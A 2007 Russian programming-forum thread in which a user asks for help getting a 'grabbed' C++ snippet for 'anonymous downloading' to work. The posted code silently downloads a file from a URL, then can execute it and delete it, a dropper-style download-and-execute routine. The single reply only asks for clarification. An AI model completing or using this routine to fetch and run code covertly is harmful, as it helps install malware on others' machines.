Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > IT форум > Помощь студентам
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Внимание! Есть замечания модератора по теме: \
Старый 08.11.2007, 01:16   #1
deazer
Новичок
Джуниор
 
Регистрация: 08.11.2007
Сообщений: 1
Восклицание Просьба разобраться с кодом на С++

Стянул я один кодик на С++ для анонимной закачки ! И неполучаеться проставить переменные и всякую дребеднь ! Помогите буду очень благодарен

//-----------------------------------------------------------------
#include <winsock2.h>
#include <tlhelp32.h>
#include <iphlpapi.h>
#include <shellapi.h>
#include <windows.h>
#include <winuser.h>
#include <wininet.h>
#include <process.h>
#include <stdlib.h>
#include <urlmon.h>
#include <stdio.h>

struct DOWNLOAD_INFO{
char *from;
char *to;
BOOL exec;
BOOL del;
};
//-----------------------------------------------------------------
DWORD WINAPI DownloadFile(LPVOID param){

DOWNLOAD_INFO file;

file = *((DOWNLOAD_INFO*)param);
URLDownloadToFile(NULL, file.from, file.to, 0, NULL);
if(file.exec){
ShellExecute(GetDesktopWindow(),"op en", file.to, NULL, NULL, SW_SHOW);
}
if(file.del){
DeleteFile(file.to);
}
return 1;
}
//-----------------------------------------------------------------
deazer вне форума Ответить с цитированием
Старый 08.11.2007, 07:55   #2
Stilet
Белик Виталий :)
Старожил
 
Аватар для Stilet
 
Регистрация: 23.07.2007
Сообщений: 57,097
По умолчанию

Ниче не понятно... Конкретнее можеш сказать что значит фраза "неполучаеться проставить переменные и всякую дребеднь"?
I'm learning to live...
Stilet вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите разобраться с кодом! sid Assembler - Ассемблер (FASM, MASM, WASM, NASM, GoASM, Gas, RosAsm, HLA) и не рекомендуем TASM 5 13.04.2010 17:53
просьба Aivar Софт 1 03.09.2008 23:46
Помогите разобраться с кодом WINApi Zaraki Общие вопросы C/C++ 13 23.03.2008 21:39
помогите разобраться с кодом samosval Assembler - Ассемблер (FASM, MASM, WASM, NASM, GoASM, Gas, RosAsm, HLA) и не рекомендуем TASM 0 27.12.2007 00:20
Помогите разобраться с кодом С++ Noor Помощь студентам 20 10.10.2007 17:42